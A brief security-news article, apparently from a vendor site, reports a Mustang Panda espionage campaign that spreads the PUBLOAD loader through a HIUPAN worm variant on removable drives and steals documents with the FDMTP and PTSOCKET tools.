HQ/EMEAFind out how we can help your business
The notorious Chinese-speaking cybercriminal organisation Mustang Panda has transitioned to a new tactic that uses new methods and malware to steal information.
According to reports, this advanced persistent threat group uses malware like FDMTP and PTSOCKET to download payloads and steal data from compromised networks. Moreover, the researchers discovered that the hackers delivered the PUBLOAD malware loader through networked detachable disks using a variation of the HIUPAN worm.
The threat actor in this campaign is a Chinese state-backed hacker group that conducts cyberespionage campaigns against government and non-government entities. This group’s primary target is countries within the Asia-Pacific region, but it occasionally attacks other areas.
Mustang Panda has been notorious for using spear-phishing emails to execute its campaign, but not in this instance.
A new investigation about this new Mustang Panda campaign shows that it spreads PUBLOAD on the network via removable drives infected with a variant of the HIUPAN worm instead of its usual infection process of using spear-phishing emails.
HIUPAN hides its presence by relocating all of its contents to a discreet directory while keeping only a seemingly valid file, USBConfig.exe, visible on the device to deceive targeted users into running it.
However, PUBLOAD is the primary control tool for this new attack process. It runs on the machine via DLL sideloading, establishes persistence by altering the Windows Registry, and then uses reconnaissance-specific commands to map the network.
Furthermore, the threat actor uses malware called FDMTP, which is a supplementary control tool. The researchers explained that the malware is integrated into a DLL’s data section and can be delivered using DLL sideloading.
The recent Mustang Panda data gathering campaigns take place in RAR archives and target various file formats, such as XLS, XLSX, DOC, DOCX, PDF, PPT, and PPTX, from specific cutoff dates.
The threat actor then exfiltrates the stolen information using PUBLOAD and the cURL tool. However, the unique PTSOCKET file transfer tool has an option that uses TouchSocket over DMTP.
This incident occurred immediately after Mustang Panda’s fast-paced spear-phishing campaign a few months ago. Researchers advise organisations, especially in the Asia-Pacific region, to be wary of the group’s recent activities since they have been all over the place in the past few months.
